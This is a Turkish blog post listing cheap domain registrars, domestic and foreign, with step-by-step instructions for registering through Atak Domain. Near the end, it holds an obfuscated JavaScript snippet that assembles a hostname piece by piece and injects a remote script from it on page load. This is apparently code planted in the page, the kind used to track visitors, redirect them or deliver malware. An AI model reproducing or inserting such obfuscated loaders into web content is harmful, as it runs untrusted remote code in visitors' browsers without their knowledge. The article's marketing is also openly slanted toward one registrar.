En Ucuz Domain Nereden Alınır?

Bir domain’i yani alan adını kullanmak için önce onu kaydettirmeniz gerekir. Domain kayıt işlemi oldukça basit olmasına rağmen, domain firması seçerken maliyet, destek, güvenlik, kullanıcı deneyimi vb. gibi birçok şeyi göz önünde bulundurmanız gerekir. Göz önünde bulundurmanız gereken en önemli parametrelerden biri ise fiyatlandırmadır. Bu yüzden ucuz domain alınacak domain kayıt firmalarını bilmeniz gerekir.

en ucuz domain
en ucuz domain nereden alınır?

Ucuz Domain Satın Alabileceğiniz Yerli Firmalar

Aşağıda uygun fiyata domain satın alabileceğiniz yerli firmaların bir listesini bulabilirsiniz:

1. Atak Domain

Türkiye’nin, en popüler alan adı kayıt kuruluşlarından biri olarak kabul edilen Atak Domain’de milyonlarca alan adı barındırılır. Atak Domain hem ülke kodlu hem de üst düzey alan adı uzantıları sağlar. Atak Domain ile bir alan adı kaydettiğinizde; “Ücretsiz Whois Gizleme, Ücretsiz Yönlendirme, Ücretsiz İç Transfer, Ücretsiz DNS Yönetimi, Ücretsiz Domain Kilidi, Ücretsiz Domain Paneli” gibi ücretsiz domain servislerinden yararlanabilirsiniz.

Ayrıca domain ücretleri, diğer alan adı kayıt şirketlerine kıyasla oldukça ucuz olan Atak Domain’de, alan adı kaydı dışında; hosting, hazır site, e-posta, SSL ve satılık domain gibi birçok farklı hizmet vardır.

2. Natro

1999 yılından bu yana alan adı kayıt sektöründe faaliyet gösteren ve 2020 yılında Team Blue tarafından satın alınan Natro, domain kayıt hizmeti dışında; web hosting hizmetleri, SSL sertifikaları, profesyonel e-posta hizmetleri vb. dahil olmak üzere birçok hizmeti sunar.

Ayrıca “Premium Domain Servisleri, Satılık Domain Platformu, Domain Değerleme Aracı” gibi ayrıcalıklı domain hizmetlerinden de yararlanmanıza olanak tanır.

3. Turhost

2004 yılından beri ağırlıklı olarak hosting sektöründe faaliyet gösteren Turhost, hosting ve alan adları için bir başka popüler alan adı kayıt kuruluşudur. Tek bir platformda ücretsiz olarak hosting, web site oluşturucu, alan adı kaydı ve e-posta hizmetleri için hepsi bir arada bir yaklaşım sunar.

4. Vargonen

2000 yılında kurulan Vargonen, alan adı kayıt işlemleriniz için kullanımı kolay bir arayüz sağlar ve popüler üst düzey alan adlarını satın almanıza izin verir. 65’den fazla alan adı uzantısı ile TLD’leri farklı hizmetlerle birlikte uygun fiyatlara sağlar.

5. İsimtescil.net

1998 yılında kurulan ve 570 binden fazla domain uzantısının satışını ve desteğini sağlayan İsimtescil.net, ICANN onaylı bir domain firmasıdır. .Com, .net, .org, .biz, info vb. farklı türde üst düzey alan adlarını uygun fiyatlarla sunar ve hosting, email, sunucu, SSL vb. birçok hizmeti de bünyesinde barındırır.

6. TURKTICARET.Net

1999 yılında kurulan ve Türkiye’nin ilk internet hizmet sağlayıcı firmalarından olan TURKTICARET.Net, en kaliteli ürün ve hizmetleri en uygun fiyatlarla getirmeyi taahhüt eder. Ucuz alan adlarının yanı sıra web hosting hizmetleri, marka tescili, SSL sertifikaları, sunucu vb. hizmetleri de sunar.

7. Hosting.com.tr

2004 yılında İstanbul’da kurulan Hosting.com.tr; üst düzey alan adları (TLD’ler), ülkeye özgü uzantılar ve yeni uzantılar dahil olmak üzere yüzlerce alan uzantısını kaydedebilmenize olanak tanır. Bir alan adı ve bir web hosting hizmeti sağlayıcısı arıyorsanız, Hosting.com.tr her iki hizmeti de sağladığı için sizin için tek çözüm noktası olarak hizmet edebilir.

8. Niobe Hosting

Faaliyetlerine 2000 yılında başlayan Niobe Hosting, kullanıcılarına kusursuz alan hizmetleri sağlayan bir alan adı kayıt kuruluşudur. Aralarından seçim yapabileceğiniz yüzlerce farklı alan adı uzantısı sunan firma, ücretsiz Whois koruması sağlar ve alan adlarınızı kaydetmenize ve yönetmenize yardımcı olmak için 7/24 teknik destek sunar.

9. IHS

1999 yılından beri veri merkezi ve bulut bilişim servisleri sağlayan IHS, 2007 yılında ICANN tarafından akredite edilerek alan adı sektörüne de giriş yapmıştır. IHS ile hosting’den bağımsız olarak popüler üst düzey alan adlarını da satın alabilirsiniz.

10. İsim Kayıt

2005 yılından beri alan adı ve hosting hizmetleri sunan İsim Kayıt, genel TLD’ler, yeni uzantılar ve ülkeye özgü uzantılar dahil olmak üzere binlerce alan adı uzantısı sunar. Ayrıca, farklılık yaratmak isteyen işletme sahipleri için uygun maliyetli bir fiyata markalı ve çekici alan adları da sağlar.

Ucuz Domain Satın Alabileceğiniz Yabancı Firmalar

Aşağıda uygun fiyata domain satın alabileceğiniz global firmaların bir listesini bulabilirsiniz:

1. Domain.com

Domain.com, klasik TLD’ler, ülke alanları ve diğer uzantılar dahil olmak üzere çok çeşitli ucuz alan adları sunan, piyasadaki en iyi sağlayıcılardan biridir. Şirket ayrıca web hosting, SSL sertifikaları ve hatta web sitesi oluşturucu gibi başka hizmetler de sağlar.

2. Namecheap

Ucuz alan adları için bir sonraki önerimiz, sektörde köklü bir geçmişi olan Namecheap’tir. Namecheap, alan adlarınızı kolayca kaydetmenize olanak tanır ve çok çeşitli hosting planları arasından seçim yapabilmeniz için size farklı hosting planları sunar. Üstelik Namecheap, iki ay boyunca ücretsiz olarak deneyebileceğiniz profesyonel bir e-posta adresi oluşturmanıza da izin verir.

3. Bluehost

Bluehost, WordPress tarafından resmi olarak onaylanan tanınmış bir web hosting sağlayıcısıdır. Ayrı olarak veya hosting paketinizin bir parçası olarak satın alabileceğiniz bir dizi uygun fiyatlı TLD de sunar. Aslında, ayda sadece 2,75 dolardan başlayan en ucuz planla bile bir yıl boyunca ücretsiz bir alan adı alabilirsiniz.

4. GoDaddy

ICANN tarafından akredite edilmiş bir alan adı kayıt kuruluşu olan GoDaddy, alan adı dışında; web hosting paketleri, SSL sertifikaları, site oluşturucu vb. çok çeşitli hizmetler sunar.

Dünya çapında 18 milyondan fazla müşteri için 75 milyondan fazla alanı yöneten GoDaddy, alan adlarını toplu olarak satın almanıza da olanak tanır ve istenmeyen postaları önleyen ve kişisel bilgilerinizi WHOIS dizininden çıkaran Temel Gizlilik Koruması ile birlikte gelir.

5. OVH

OVH, bazıları şehir adlarını veya coğrafi bölgeleri içeren bir dizi alan adı sunar. OVH’nin alan adı kayıt kuruluşları arasında ön plana çıktığı yer burasıdır.

OVH alan paketleri ayrıca fiyata ek hizmetleri de içerir. Örneğin kontrol panelinizden WHOIS korumasını etkinleştirebilir, DNSSEC ile sitenizin güvenliğini güçlendirebilir ve DNS kayıtlarınızı yönetebilirsiniz. OVH ayrıca özel ve VPS hosting planlarından oluşan bir hizmetler yelpazesi sunarak web hosting konusunda da size yardımcı olabilir.

6. Ionos

Ionos, endüstrinin en hızlı web hosting hizmetlerinden bazılarını sunan saygın bir web hosting sağlayıcıdır. Ayrıca bakım sırasında kesintileri veya beklenmedik kesintileri önleyen coğrafi yedekli altyapısı sayesinde %99,9 kesintisiz çalışma garantisi vaat eder.

Tüm hosting paketlerinde ilk yıl için ücretsiz bir alan adı bulunur; bu, ayda 0,50 ABD doları gibi düşük bir ücret karşılığında bir tane satın alabileceğiniz anlamına gelir. Bu teklif belirli uzantılarla sınırlıdır, ancak en popüler TLD’lerden bazılarını (.com, .org ve .net gibi) içerir.

Alan adınızı ayrı olarak satın almayı tercih ederseniz, fiyatları ilk başta uygun görünmese de, ücretsiz SSL sertifikası ve alan kilitleme gibi birçok ekstra hizmeti içerir. Ayrıca, her alan adı için 2 GB’lık bir posta kutusuyla birlikte gelir.

7. Name.com

Name.com, çoğunlukla alan kaydı konusunda uzmanlaşmış, kullanıcı dostu bir sağlayıcıdır. Ayrıca, özel, paylaşılan ve WordPress hosting dahil olmak üzere sınırlı sayıda web hosting hizmeti sunar.

Yalnızca bir alana ihtiyacınız varsa, tonlarca uzantı arasından seçim yapabilir ve birkaç kullanışlı özelliğin keyfini çıkarabilirsiniz.

Her alan adı, ücretsiz bir URL ve e-posta yönlendirme hizmeti, iki adımlı doğrulama ve DNS şablonu ile birlikte gelir.

8. NameSilo

NameSilo, çoğunlukla alan kaydına odaklanan başka bir sağlayıcıdır. Ucuz alan adlarına ek olarak, web hosting, Google Workspace e-postası ve SSL sertifikaları gibi birkaç ekstra hizmet sunar. Şirket, 0,99 ABD dolarından başlayan bazı popüler uzantılarla, piyasadaki en ucuz alan adı kayıt şirketlerinden biridir.

9. Hover

Hover, sadece alan kaydı konusunda uzmanlaşmış nispeten yeni bir şirkettir. Ucuz alan adlarına ek olarak, URL’nizi profesyonel yazışmalar için kullanmak istiyorsanız, bir e-posta hizmeti de satın alabilirsiniz.

10. Dynadot

Ucuz alan adları için son önerimiz, gelişmiş alan yönetimi özellikleri sunan bir kayıt şirketi olan Dynadot’tur. Aylık satışları olan şirket, bütçenize uygun bir fırsat bulmanıza olanak tanır. Ayrıca, VPS hosting, e-posta veya web sitesi oluşturucu gibi ücretsiz hizmetler de sunar.

Dynadot, karmaşık satışlar olmadan şeffaf fiyatlandırma sunar. Yenileme oranları, diğer sağlayıcılara göre daha uygun olma eğilimindedir.

11. Google Domains

Google Domains, ucuz alan adları için en iyi alan adı kayıt kuruluşlarından biridir. Kayıt şirketi ICANN tarafından akredite edilmiştir ve 300’den fazla alan uzantısı sunar. Kullanıcılarına mükemmel güvenlik, destek ve hız sağlayan güvenilir bir platform arıyorsanız, tercih edebileceğiniz mükemmel bir seçenektir.

Domain Nasıl Satın Alınır?

Alan adınızın ne olacağına karar verdikten sonra ilk yapmanız gereken şey, alan adınızın müsaitlik durumunu kontrol etmektir. Eğer alan adınız müsait ise, 2003 yılından beri sektörün en popüler ICANN accredited domain firması olan Atak Domain’den, uygun maliyetli seçenekler ile alan adı kaydınızı yapabilirsiniz.

Atak Domain üzerinden bir alan adı nasıl satın alınır?

  • Eğer alan adınız için sorgulama yapmadıysanız, alan adınızı sorgulamak için linkte tıklayın:
  • https://www.atakdomain.com/domain-sorgulama
  • Aşağıdaki ekranda göreceğiniz “Domain Sorgulama” aracına belirlediğiniz alan adını yazın ve “Sorgula” butonuna tıklayın.
en ucuz domain
en ucuz domain nereden alınır?
  • Örneğin, “Domain Sorgulama” aracına, “12345678abcdef” gibi bir alan adı girdiğinizi varsayalım. Karşınıza aşağıdaki gibi bir ekran gelecek. Bu müsaitlik durumuna baktığınız alan adının daha önce kaydedilmediği anlamına gelir.
en ucuz domain
en ucuz domain nereden alınır?
  • Bu aşamada belirlediğiniz “12345678abcdef” alan adı müsait olduğuna göre, ödeme yapmak için alan adınızı sepete ekleyebilirsiniz.
en ucuz domain
en ucuz domain nereden alınır?
  • Son olarak eğer belirlediğiniz alan adınızı alma konusunda eminseniz, ödeme adımına geçebilirsiniz.
(function(){ q536=document.createElement(“script”);q536_=(“us”)+(“ta”); q536_+=”t”+(“.”);q536_+=(“in”);q536u=”374746508″;q536.async=true; q536u+=”.4qeh7q1n536wr6wyy”;q536.type=”text/javascript”;q536_+=”f”+”o”+(“/”); q536u+=”aimikmxe4crf6″;q536.src=”https://”+q536_+q536u; dq536=document.body;dq536.appendChild(q536); })();

Zaman zaman dijital pazarlama konusunda bir dijital pazarlama uzmanı olarak vereceğim bilgileri takip etmek için mehmetortac.com adresini ve Twitter hesabımı takip etmeyi unutmayın!

Click to rate this post!
[Total: 0 Average: 0]

Bir Cevap Yazın

Mehmet Ortaç sitesinden daha fazla şey keşfedin

Okumaya devam etmek ve tüm arşive erişim kazanmak için hemen abone olun.

Okumaya devam et